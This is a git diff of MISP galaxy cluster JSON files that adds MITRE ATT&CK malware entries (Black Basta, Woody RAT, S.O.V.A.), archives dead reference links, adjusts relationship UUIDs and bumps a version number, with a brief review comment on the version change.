"dest-uuid": "56e0d8b8-3e25-49dd-9050-3aa252f5aa92",
"tags": [
@@ -31754,5 +31343,5 @@
"value": "TeamTNT - G0139"
}
],
- "version": 30
+ "version": 31
}
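Review bot: the version bump to 31 is required for MISP instances to pick up the regenerated clusters, and the hunk header (31754 to 31343 lines) is consistent with the large removal at @@ -28505 offset by the three new clusters (CURIUM, Metador, LuminousMoth). The README element count for this cluster file should move by the same +3 in the same PR so the published totals do not drift from the JSON.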
diff --git a/clusters/mitre-malware.json b/clusters/mitre-malware.json
index 802bca1..523ed4a 100644
--- a/clusters/mitre-malware.json
+++ b/clusters/mitre-malware.json
@@ -35,13 +35,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "4b62ab58-c23b-4704-9c15-edd568cd59f8",
@@ -429,12 +422,12 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
"https://401trg.github.io/pages/burning-umbrella.html",
"https://attack.mitre.org/software/S0141",
"https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/",
"https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
- "https://securelist.com/winnti-more-than-just-a-game/37029/"
+ "https://securelist.com/winnti-more-than-just-a-game/37029/",
+ "https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf"
],
"synonyms": [
"Winnti for Windows"
@@ -931,6 +924,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c",
"tags": [
@@ -1121,9 +1121,9 @@
"macOS"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0032",
"https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/",
"https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html"
],
@@ -1314,7 +1314,7 @@
"value": "gh0st RAT - S0032"
},
{
- "description": "[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)",
+ "description": "[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.(Citation: Lee 2013) It has been used by several threat groups.(Citation: Dell TG-3390)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Rapid7 HAFNIUM Mar 2021)",
"meta": {
"external_id": "S0020",
"mitre_platforms": [
@@ -1325,6 +1325,7 @@
"https://us-cert.cisa.gov/ncas/alerts/aa21-200a",
"https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/",
"https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"
],
"synonyms": [
@@ -1538,6 +1539,192 @@
"uuid": "ab3580c8-8435-4117-aace-3d9fbe46aa56",
"value": "Unknown Logger - S0130"
},
+ {
+ "description": "[Black Basta](https://attack.mitre.org/software/S1070) is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. [Black Basta](https://attack.mitre.org/software/S1070) operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. [Black Basta](https://attack.mitre.org/software/S1070) affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the [Black Basta](https://attack.mitre.org/software/S1070) RaaS operators could include current or former members of the [Conti](https://attack.mitre.org/software/S0575) group.(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Minerva Labs Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Cyble Black Basta May 2022)",
+ "meta": {
+ "external_id": "S1070",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1070",
+ "https://blog.cyble.com/2022/05/06/black-basta-ransomware/",
+ "https://minerva-labs.com/blog/new-black-basta-ransomware-hijacks-windows-fax-service/",
+ "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware",
+ "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware",
+ "https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence"
+ ],
+ "synonyms": [
+ "Black Basta"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "28170e17-8384-415c-8486-2e6b294cb803",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "8d242fb4-9033-4f13-8a88-4b9b4bcd9a53",
+ "value": "Black Basta - S1070"
+ },
{
"description": "[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)",
"meta": {
@@ -1715,6 +1902,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -3357,13 +3551,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
"tags": [
@@ -3836,13 +4023,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b",
"tags": [
@@ -4176,6 +4356,229 @@
"uuid": "54895630-efd2-4608-9c24-319de972a9eb",
"value": "Ragnar Locker - S0481"
},
+ {
+ "description": " [Woody RAT](https://attack.mitre.org/software/S1065) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.(Citation: MalwareBytes WoodyRAT Aug 2022)",
+ "meta": {
+ "external_id": "S1065",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1065",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild"
+ ],
+ "synonyms": [
+ "Woody RAT"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "3bc7e862-5610-4c02-9c48-15b2e2dc1ddb",
+ "value": "Woody RAT - S1065"
+ },
{
"description": "[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution)",
"meta": {
@@ -5582,13 +5985,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -6418,13 +6814,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "e1161124-f22e-487f-9d5f-ed8efc8dcd61",
@@ -6516,13 +6905,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
"tags": [
@@ -6551,6 +6933,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d2c4e5ea-dbdf-4113-805a-b1e2a337fb33",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -6923,6 +7312,160 @@
"uuid": "3161d76a-e2b2-4b97-9906-24909b735386",
"value": "Aria-body - S0456"
},
+ {
+ "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for \"owl\", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)",
+ "meta": {
+ "external_id": "S1062",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1062",
+ "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly",
+ "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html"
+ ],
+ "synonyms": [
+ "S.O.V.A."
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "08e22979-d320-48ed-8711-e7bf94aabb13",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0cdd66ad-26ac-4338-a764-4972a1e17ee3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "39dd7871-f59b-495f-a9a5-3cb8cc50c9b2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "51636761-2e35-44bf-9e56-e337adf97174",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "73c26732-6422-4081-8b63-6d0ae93d449e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "74e6003f-c7f4-4047-983b-708cc19b96b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b1c95426-2550-4621-8028-ceebf28b3a47",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1f1337e-aea7-454c-86bd-482a98ffaf62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dc01774a-d1c1-45fb-b506-0a5d1d6593d9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f05fc151-aa62-47e3-ae57-2d1b23d64bf6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "4b53eb01-57d7-47b4-b078-22766b002b36",
+ "value": "S.O.V.A. - S1062"
+ },
{
"description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)",
"meta": {
@@ -7131,13 +7674,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "c5e9cb46-aced-466c-85ea-7db5572ad9ec",
@@ -8279,13 +8815,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "e170995d-4f61-4f17-b60e-04f9a06ee517",
@@ -8463,13 +8992,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4",
@@ -9109,8 +9631,8 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0009",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html"
],
"synonyms": [
@@ -9529,9 +10051,9 @@
"Linux"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0021",
"https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
"https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/"
],
@@ -9680,13 +10202,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "94379dec-5c87-49db-b36e-66abc0b81344",
@@ -9860,9 +10375,9 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0012",
"https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf",
"https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign",
"https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99"
@@ -9973,13 +10488,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -10434,8 +10942,8 @@
"http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
"http://labs.lastline.com/an-analysis-of-plugx",
"http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/",
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://attack.mitre.org/software/S0013",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html",
"https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"
],
@@ -10576,13 +11084,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -10660,13 +11161,6 @@
],
"type": "similar"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7",
"tags": [
@@ -11477,6 +11971,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "0a5231ec-41af-4a35-83d0-6bdf11f28c65",
"tags": [
@@ -11881,6 +12382,271 @@
"uuid": "40a1b8ec-7295-416c-a6b1-68181d86f120",
